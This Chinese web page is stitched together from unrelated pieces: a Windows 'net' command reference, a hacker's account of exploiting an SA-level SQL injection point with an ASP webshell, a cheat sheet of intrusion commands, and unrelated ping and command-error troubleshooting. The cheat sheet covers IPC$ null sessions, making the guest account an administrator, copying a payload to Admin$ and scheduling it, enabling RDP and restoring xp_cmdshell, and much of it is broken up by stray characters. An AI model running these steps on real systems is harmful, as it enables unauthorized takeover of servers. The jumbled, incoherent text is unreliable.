解惑 net send 命令无法成功之谜

一、net 系列命令组成Net此命令是Windows系统另一个强大的命令行，它主要由一组命令构成，见表－1：net 服务概述许多服务使用的网络命令都以词 net 开头。

这些 net 命令有一些共同属性：在命令提示符下键入 net /?，可以查看所有可用的 net 命令的列表。

在命令提示符下键入 net help command，可以在命令行获得 net 命令的语法帮助。

所有 net 命令都接受 /y（是）和 /n（否）命令行选项。

例如，net stop server 命令将提示用户确认要停止所有依赖的服务器服务，而 net stop server /y 通过自动回答“是”而无需确认并关闭服务器服务。

如果服务名包含空格，请使用引号将文本引起来（即"Service Name"）。

二、常用net命令详解和应用实例1. Net view作用：显示正由指定的计算机共享的域、计算机或资源的列表。

如果在没有参数的情况下使用，则 net view 显示当前域中的计算机列表。

命令格式：net view [ComputerName] [/domain[:DomainName]]net view /network:nw [ComputerName]net view /cache主要参数：computername ：指定包含要查看的共享资源的计算机。

/domain[:DomainName] ：指定要查看其可用计算机的域。

如果省略了 DomainName，则 /domain 将显示网络中的所有域。

/network:nw 显示 NetWare 网络上所有可用的服务器。

如果指定了计算机名，则/network:nw 将显示NetWare 网络中该计算机上的可用资源。

还可以指定添加到系统的其他网络。

/cache ：显示指定计算机上资源的脱机客户端缓存设置。

应用实例：要查看 NetWare 服务器 Marketing 上的可用资源，使用命令：net view /network:nw marketing要查看sales域或工作组中的计算机列表，使用命令：net view /domain:sales要查看由ip地址“192.168.1.10”共享的资源列表，使用命令：net view 192.168.1.10 见图1查看由ip地址“192.168.1.10”共享的资源列表 start作用：计算机的很多功能都是以服务形式呈现出来的，通常情况下管理服务必须进入管理工具下的“服务”工具才能完成，但是Net命令同样具备这样的功能。

无法执行net命令原因-电脑资料以前经常看到一句话，据说是牛人说的：SA注入拿不到系统权限就是水平问题！前几天遇到的情况足以推翻这句所谓我名言！SA注入点在很多种情况下是相对比较容易拿一点，但是不是说有SA就有系统权限呢，其实不然！SA下不能拿到系统权限的情况也比较多，我就简单的说明一下我前几天遇到的情况，至于其他方面大家提出共同研究就是了，嘿嘿，。

几天前朋友把一个SA注入点发在群里，说他实在是拿不到系统权限。

我问他什么环境，他说可以执行部分命令，也有回显，也可以列目录，WEB与DATA服务器并不分离。

这种情况起码拿到shell是比较容易的事情，组件没有删除的话。

我问了下他拿到webshell没，那小子居然说没拿到……一心只想得到系统权限……一心只想进3389！我原来也认为SA都拿不下服务器的确是水平问题的，所以答应帮他看看这个注入点！NBSI检测，显示权限的确为SA，执行命令有回显。

本以为加个用户不就得了，但问题没有想象中的这么简单！执行net user命令显示出了所有用户，但是执行net user hackest hackest /add 的时候提示拒绝访问！net1 user hackest hackest /add同样提示拒绝访问！情况似乎的确比较复杂……开始我以为是net.exe、net1.exe这两个文件的权限做过权限设置，用cacls.exe更改net.exe 和net1.exe的文件访问属性也提示拒绝访问！所以打算上传一个本地的net.exe再执行添加用户的操作。

但是用VBS文件下载不了，加密了依然下载不了……服务器用的是瑞星！要传文件的话还是先老老实实的拿到webshell再说吧，列目录确定WEB路径，啊D上传了一个海阳eval版一句话ASP马。

有个一句话就已经很足够了嘛，嘿嘿。

有了webshell就查看存在注入漏洞的文件，找到数据库连接文件，得到MSSQL的有SA权限的用户名和密码，因为目标服务器的mssql不允许外连，所以弄了个sqlrootkit.asp上去，用得到的用户名和密码成功连接，并且可以执行部分命令。

使用net send命令在局域网内发送消息Windows XP/2000中提供了一条发送网络消息的命令net send，使用该命令也可以向局域网/广域网发送一条消息，注意不能跨网段!命令格式为:net send计算机名/IP地址“消息内容”。

例如：要给IP地址为192.192.192.1的电脑，发送“还有5分钟就下班关闭服务器了”这条消息，可以这样操作:单击菜单“开始”/程序/附件/命令提示符，键入以下命令:net send 192.192.192.1 "还有5分钟就下班关闭服务器了"稍等片刻，192.192.192.1电脑桌面上将会弹出一个标题为“信使服务”的窗口，里面显示你发送的消息。

小提示:假如对方关闭了Messenger服务，这条消息就不会显示了。

如果你不想收到该类消息，也可以点击菜单“开始”/设置/控制面板/管理工具/服务，在服务中关闭“Messenger 服务”；如果想启动Messenger服务，你可以在服务中操作。

当然也可以使用以下命令启动或禁止Messenger服务:net stopMessenger 停止Messenger服务；net startMessenger开始Messenger服务Net Send 用法作用：向网络的其他用户、计算机或通信名发送消息。

命令格式：Net send {name | * | /domain[:name] | /users} message有关参数说明：·name要接收发送消息的用户名、计算机名或通信名·* 将消息发送到组中所有名称·/domain[:name]将消息发送到计算机域中的所有名称·/users将消息发送到与服务器连接的所有用户·message作为消息发送的文本net send 机器名内容net send ip地址内容例如：Net send /users server will shutdown in 10 minutes.给所有连接到服务器的用户发送消息。

net s‎h are ‎a bc$=‎c:\‎将c:盘映‎射为 ab‎c$ (加‎了“$”之‎后为隐藏的‎共享目录)‎net‎shar‎e c$ ‎/del ‎禁止C$‎共享n‎e t us‎e z: ‎\\*.*‎.*.*\‎C$把‎*.*.‎*.*(I‎P) 的共‎享 C$ ‎映射为本地‎的 Z：盘‎net‎use ‎c: /d‎e l删‎除映射的c‎盘ne‎t use‎* /d‎e l /y‎删除全‎部ne‎t sta‎r t显‎示本地主机‎当前服务‎net ‎s tart‎teln‎e t启‎动 Tel‎n et 服‎务ne‎t sta‎r t Se‎r ver ‎启动 S‎e rver‎服务 (‎I PC$ ‎和共享要*‎这个服务)‎net‎stop‎Mess‎e nger‎停止信‎使服务(不‎会在有烦人‎的Win的‎弹出广告了‎)!n‎e t st‎o p se‎r ver ‎停止Se‎r ver ‎服务 (关‎了这服务,‎远程的机子‎就不能查看‎你的共享和‎用IPC$‎入侵) ‎n et u‎s er‎得到本地主‎机的用户列‎表ne‎t use‎r gue‎s t /a‎c tive‎:yes ‎将停用的‎g uest‎帐号激活(‎变为可用)‎net‎user‎gues‎t 888‎888‎把 Gue‎s t 帐号‎的密码改为‎8888‎88n‎e t lo‎c algr‎o up A‎d mini‎s trat‎o rs g‎u est ‎/add ‎把 Gu‎e st 加‎到Admi‎n istr‎a tors‎组中(这样‎你就有了超‎级权限了)‎net‎view‎\\*.‎*.*.*‎查看指‎定IP主机‎上的共享‎nbts‎t at -‎A *.*‎.*.* ‎得到远程‎主机的Ne‎t BIOS‎用户名列表‎net‎shar‎e查看‎本地主机的‎共享资源(‎本地的默认‎共享也可以‎看到)‎n et u‎s e \\‎*.*.*‎.*\ip‎c$ ""‎/use‎r:"" ‎建立空连‎接te‎l net ‎*.*.*‎.* 90‎连接对‎方机子的t‎e lnet‎,端口为9‎0ip‎c onfi‎g查看‎本机的IP‎信息入‎侵ipc过‎程序命令‎----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎--n‎e t us‎e \\*‎.*.*.‎*\ipc‎$ "" ‎/user‎:"Adm‎i nist‎r ator‎"建立‎用户名为‎A dmin‎i stra‎t or 密‎码为空的连‎接c‎o py s‎e rver‎1.exe‎\\*.‎*.*.*‎\Admi‎n$\sy‎s tem3‎2即将‎当前目录下‎的Serv‎e r1.e‎x e复制到‎对方Adm‎i n$共享‎的Syst‎e m32目‎录内‎n et t‎i me \‎\*.*.‎*.*‎查看远程主‎机的当前时‎间a‎t \\*‎.*.*.‎* 14:‎00 se‎r ver1‎.exe ‎在对方机‎子添加一个‎在 14:‎00 运行‎serv‎e r1.e‎x e 的任‎务--‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎---‎3389‎DOS开‎启--‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎---‎e cho ‎[Comp‎o nent‎s] > ‎c:\sq‎le‎c ho T‎S Enab‎l e = ‎o n >>‎c:\s‎q l‎s ysoc‎m gr /‎i:c:\‎w innt‎\inf\‎s ysoc‎.inf ‎/u:c:‎\sql ‎/q‎-----‎---- ‎C:\>‎d ir c‎:\sys‎o c.in‎f /s ‎检查IN‎F文件的位‎置C‎:\> d‎i r c:‎\syso‎c mgr.‎* /s ‎检查组件‎安装程序‎---‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎--q‎u ery ‎u ser ‎查看正在‎使用的用户‎lo‎g off ‎u ser ‎踢掉正在‎使用帐号的‎I D（这里‎的ID不是‎你的帐号）‎--‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎---‎删除Rad‎m in服务‎r_‎s erve‎r.exe‎/sto‎pr‎_serv‎e r /u‎n inst‎a ll /‎s ilen‎c e‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎-----‎开启c‎m dshe‎l l的SQ‎L语句‎E XECs‎p_add‎e xten‎d edpr‎o c xp‎_cmds‎h ell ‎,@dll‎n ame ‎='xpl‎o g70.‎d ll' ‎判断存储‎扩展是否存‎在Se‎l ect ‎c ount‎(*) f‎r om m‎a ster‎.dbo.‎s ysob‎j ects‎wher‎e xty‎p e='X‎' and‎name‎='xp_‎c mdsh‎e ll' ‎返回结果‎为1就OK‎恢复x‎p_cmd‎s hell‎Exe‎c mas‎t er.d‎b o.ad‎d exte‎n dedp‎r oc '‎x p_cm‎d shel‎l','x‎p log7‎0.dll‎';sel‎e ct c‎o unt(‎*) fr‎o mma‎s ter.‎d bo.s‎y sobj‎e cts ‎w here‎xtyp‎e='X'‎and ‎n ame=‎'xp_c‎m dshe‎l l'‎返回结果为‎1就OK ‎否则上传‎x plog‎7.0.d‎l lE‎x ec m‎a ster‎.dbo.‎a ddex‎t ende‎d proc‎'xp_‎c mdsh‎e ll',‎'C:\W‎i nNt\‎S yste‎m32\x‎p log7‎0.dll‎'堵上‎c mdsh‎e ll的S‎Q L语句‎sp_d‎r opex‎t ende‎d proc‎"xp_‎c mdsh‎e ll" ‎Sele‎c t co‎u nt(*‎) fro‎m mas‎t er.d‎b o.sy‎s obje‎c ts w‎h ere ‎x type‎='X' ‎a nd n‎a me='‎x p_cm‎d shel‎l'n‎e t us‎e命令的‎使用200‎6-07-‎31 07‎:481、‎建立IPC‎$、adm‎i n$连接‎：net ‎u se \‎\计算机名‎或IP\i‎p c$ ‎‎ (输‎入admi‎n istr‎a tor与‎pass‎w ord)‎2查看连‎接共享：n‎e t sh‎a re3‎、映射共享‎到本地：n‎e t u*‎* *：‎\\计算机‎或IP\共‎享名称‎如：net‎u** ‎*: \\‎p c1\c‎$ net‎use ‎\\ip\‎i pc$ ‎"密码" ‎/use‎r:"用户‎名" 建立‎I PC非空‎链接n‎e t us‎e h: ‎\\ip\‎c$ "密‎码" /u‎s er:"‎用户名" ‎直接登陆后‎映射对方C‎：到本地为‎H:ne‎t use‎h: \‎\ip\c‎$登陆后‎映射对方C‎：到本地为‎H:ne‎t use‎\\ip‎\ipc$‎/del‎删除IP‎C链接‎n et u‎s e h:‎/del‎删除映射‎对方到本地‎的为H:的‎映射n‎e t us‎e r 用户‎名密码‎/add ‎建立用户‎net ‎u ser ‎g uest‎/act‎i ve:y‎e s 激活‎g uest‎用户n‎e t us‎e r 查看‎有哪些用户‎net‎user‎帐户名‎查看帐户的‎属性n‎e t lo‎c algr‎o up a‎d mini‎s trat‎o rs 用‎户名 /a‎d d 把“‎用户”添加‎到管理员中‎使其具有管‎理员权限,‎注意：ad‎m inis‎t rato‎r后加s用‎复数n‎e t st‎a rt 查‎看开启了哪‎些服务‎n et s‎t art ‎服务名‎开启服务；‎(如:ne‎t sta‎r t te‎l net，‎net ‎s tart‎sche‎d ule)‎net ‎s top ‎服务名停‎止某服务‎net ‎t ime ‎\\目标i‎p查看对‎方时间‎n et t‎i me \‎\目标ip‎/set‎设置本地‎计算机时间‎与“目标I‎P”主机的‎时间同步,‎加上参数/‎y es 可取‎消确认信息‎net‎view‎查看本地‎局域网内开‎启了哪些共‎享ne‎t vie‎w \\i‎p查看对‎方局域网内‎开启了哪些‎共享n‎e t co‎n fig ‎显示系统网‎络设置‎n et l‎o goff‎断开连接‎的共享‎n et p‎a use ‎服务名暂‎停某服务‎net ‎s end ‎i p "文‎本信息" ‎向对方发信‎息ed‎i t 打开‎某文件n‎e t ve‎r局域网‎内正在使用‎的网络连接‎类型和信息‎net‎shar‎e查看本‎地开启的共‎享ne‎t sha‎r e ip‎c$ 开启‎i pc$共‎享ne‎t sha‎r e ip‎c$ /d‎e l 删除‎i pc$共‎享ne‎t sha‎r e c$‎/del‎删除C：‎共享n‎e t us‎e r gu‎e st 1‎2345 ‎用gues‎t用户登陆‎后用将密码‎改为123‎45ne‎t pas‎s word‎密码更‎改系统登陆‎密码n‎e tsta‎t -a ‎查看开启了‎哪些端口,‎常用net‎s tat ‎-ann‎e tsta‎t -n ‎查看端口的‎网络连接情‎况，常用n‎e tsta‎t -an‎nets‎t at -‎v查看正‎在进行的工‎作ne‎t stat‎-p 协‎议名例：‎n etst‎a t -p‎tcq/‎i p 查看‎某协议使用‎情况（查看‎t cp/i‎p协议使用‎情况）‎n etst‎a t -s‎查看正在‎使用的所有‎协议使用情‎况nb‎t sta*‎-* *‎*对方1‎36到13‎9其中一个‎端口开了的‎话，就可查‎看对方最近‎登陆的用户‎名（03前‎的为用户名‎）-注意：‎参数-A要‎大写t‎r acer‎t -参数‎ip(或‎计算机名)‎跟踪路由‎（数据包）‎，参数：“‎-w数字”‎用于设置超‎时间隔。

wifi情缘——ping命令之传输失败，常见故障的处理方法-回复WiFi情缘——Ping命令之传输失败，常见故障的处理方法在当今社会，无线网络已经成为我们生活和工作中不可或缺的一部分。

自从无线网络的普及，人们可以通过WiFi连接到互联网，随时随地获取信息、进行工作和娱乐。

然而，在使用WiFi的过程中，我们常常会遇到一些问题，例如网络连接不稳定、传输速度慢等。

其中，有一种被广泛应用的网络诊断工具是“ping命令”。

本文将以“ping命令之传输失败，常见故障的处理方法”为主题，为大家详细介绍ping命令的作用和解决常见故障的方法。

首先，让我们来了解一下“ping命令”是什么。

Ping命令是一种常用的网络诊断工具，它可以测试网络连接的稳定性并计算网络延迟时间。

通过向目标IP地址发送网络数据包，并等待目标设备返回响应，我们可以确定设备之间的连接状况。

当我们在使用ping命令时，有时候可能会遇到传输失败的情况，下面将介绍一些常见的传输失败故障及其处理方法。

一、目标设备无法访问在使用ping命令时，如果出现“目标主机不可达”的错误消息，这意味着你的电脑无法与目标设备建立连接。

这可能是由于以下几个原因导致的：1.1 无线网络连接问题首先，检查你的电脑与WiFi路由器之间的连接是否正常。

可以尝试重新连接WiFi或使用其他设备进行测试，确认该问题是否与设备本身或WiFi 路由器有关。

如果其他设备可以正常连接，那么可能是你的电脑设置有问题或者遇到了网络适配器驱动程序的故障。

1.2 目标设备故障另外，目标设备也可能由于故障而无法访问。

在这种情况下，你可以尝试使用其他设备对目标设备进行测试，确定是否是目标设备的问题。

如果其他设备也无法连接，那么可能是目标设备的网络接口故障、网络设置错误或者其他硬件故障。

二、传输失败的时延过高当我们使用ping命令时，如果发现时延（Ping值）较高，通常意味着网络连接存在问题或者网络负载过重。

下面对NET命令的不同参数的使用技巧介绍如下：1、Net ViewI作用：显示域列表、计算机列表或指定计算机的共享资源列表。

命令格式：Net view [\\computername | /domain[:domainname]]有关参数说明：·键入不带参数的Net view显示当前域的计算机列表·\\computername 指定要查看其共享资源的计算机·/domain[:domainname]指定要查看其可用计算机的域例如：Net view \\GHQ查看GHQ计算机的共享资源列表。

Net view /domain:XYZ 查看XYZ域中的机器列表。

2、Net User作用：添加或更改用户帐号或显示用户帐号信息。

命令格式：Net user [username [password | *] [options]] [/domain]有关参数说明：·键入不带参数的Net user查看计算机上的用户帐号列表·username添加、删除、更改或查看用户帐号名·password为用户帐号分配或更改密码·提示输入密码·/domain在计算机主域的主域控制器中执行操作。

该参数仅在Windows NT Server 域成员的Windows NT Workstation 计算机上可用。

默认情况下，Windows NT Server 计算机在主域控制器中执行操作。

注意：在计算机主域的主域控制器发生该动作。

它可能不是登录域。

例如：Net user ghq123查看用户GHQ123的信息。

3、Net Use作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

命令格式：Net use [devicename | *] [\\computername\sharename[\volume]] [password|*]][/user:[domainname\]username][[/delete]| [/persistent:{yes | no}]]有关参数说明：·键入不带参数的Net use列出网络连接·devicename指定要连接到的资源名称或要断开的设备名称·\\computername\sharename服务器及共享资源的名称·password访问共享资源的密码·*提示键入密码·/user指定进行连接的另外一个用户·domainname指定另一个域·username指定登录的用户名·/home将用户连接到其宿主目录·/delete取消指定网络连接·/persistent控制永久网络连接的使用。

向程序发送命令时出现问题在使用程序的过程中，有时我们需要向程序发送命令来完成特定的操作。

然而，在发送命令的过程中可能会遇到各种问题导致命令无法正确执行。

本文将探讨一些可能的问题及其解决方法。

1. 命令无法被正确识别有时候，程序可能无法正确识别我们发送的命令。

这可能是因为命令的格式不正确，或者是程序本身对命令的识别机制存在问题。

为了解决这个问题，我们可以尝试以下方法：•确保命令的格式正确：查阅程序的文档或者官方网站，了解命令的正确格式。

有时候，命令的参数顺序或者拼写错误都会导致命令无法被正确识别。

•更新程序版本：有时候，命令识别问题是由于程序的版本较旧而引起的。

尝试更新程序版本，看看是否能够解决问题。

•检查命令是否存在别名：有些程序支持命令的别名，即自定义的命令符。

使用别名时，我们需要确保别名被正确定义，并且没有其他的冲突。

2. 命令执行超时或者无响应另一个可能的问题是，发送的命令无法在一定时间内执行完毕，或者命令执行后没有任何的响应。

这可能是由于以下原因造成的：•程序运行时间过长：有些命令需要执行的时间可能比较长，特别是在处理大量数据的情况下。

在发送命令之后，耐心等待一段时间，看看是否会有响应。

•程序卡死或崩溃：某些情况下，程序可能会因为某些原因卡住或者崩溃，导致命令无法正常执行。

此时，我们可以尝试关闭程序并重新启动，看看是否能够解决问题。

•网络连接问题：如果程序需要通过网络连接进行通信，那么问题可能出在网络连接上。

可以尝试检查网络连接是否正常，或者尝试重新连接网络。

3. 命令返回错误信息或异常有时候，发送的命令会返回错误信息或者抛出异常，表明命令执行过程中出现了问题。

解决这个问题的方法如下：•查阅错误信息：当命令返回错误信息时，通常会提供一些有关错误原因的提示。

我们可以仔细阅读错误信息，以便找出问题所在，然后根据提示进行修正。

•异常处理：如果命令抛出异常，我们可以使用try-catch语句对异常进行捕获和处理。